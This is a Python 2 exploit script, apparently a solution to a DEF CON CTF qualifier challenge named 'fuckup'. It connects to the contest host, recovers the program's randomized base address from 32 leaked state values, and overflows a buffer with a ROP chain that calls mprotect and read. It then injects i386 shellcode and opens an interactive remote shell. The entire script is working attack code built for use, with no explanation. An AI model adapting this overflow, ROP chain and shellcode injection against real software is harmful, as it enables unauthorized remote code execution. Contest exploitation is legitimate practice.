from codez import *
import time
import rnd
class F(Remote):

    def _write_no_rand(self,x):
        for c in str(x):
            self.write(c)
            time.sleep(0.4)
    
    def _cmd(self,n):
        self.read('0.')
        self.read(6)
        self._write_no_rand(str(n)+"\n")

    def show_info(self):
        self._cmd(1)
        for i in range(3):
            print self.read("\n"),

    def get_state(self):
        self._cmd(3)
        return int(self.read("\n").split(' ')[-1].strip(),16)
            
    def vuln(self,data,last=1):
        self._cmd(4)
        data = data.ljust(100-last,"\x00")
        for i in range(2): self.read("\n")
        self.write(data)
        time.sleep(1)
        self.write("\x00"*last)


def gen_rop(base):
    r = [] 
    def _read(fd,addr,size):
        r.append(pack('I',base+0x8AF))
        r.append(pack('I',base+0x61f))
        r.append(pack('I',fd))
        r.append(pack('I',addr))
        r.append(pack('I',size))


    def _mprotect(addr,size,p):
        r.append(pack('I',base+0x801))
        r.append(pack('I',base+0x61f))
        r.append(pack('I',addr))
        r.append(pack('I',size))
        r.append(pack('I',p))


    _mprotect(base,0x1000,7)
    _read(0,base,0x100)
    r.append(pack('I',base))
    return ''.join(r)
import sys
    
#r = F('localhost',1234)
r = F('fuckup_56f604b0ea918206dcb332339a819344.quals.shallweplayaga.me',2000)
#print len(gen_rop(0xdeadbeef))
zz = []
for i in range(32):
    zz.append(1 + r.get_state())
base = rnd.get_base(zz)
print '[+] base',hex(base)
sys.stdout.flush()

r.vuln('A'*22 + gen_rop(base))
print '[*] wait for shell...'
sys.stdout.flush()
time.sleep(0.5)

r.write(sh('i386'))
r.interactive()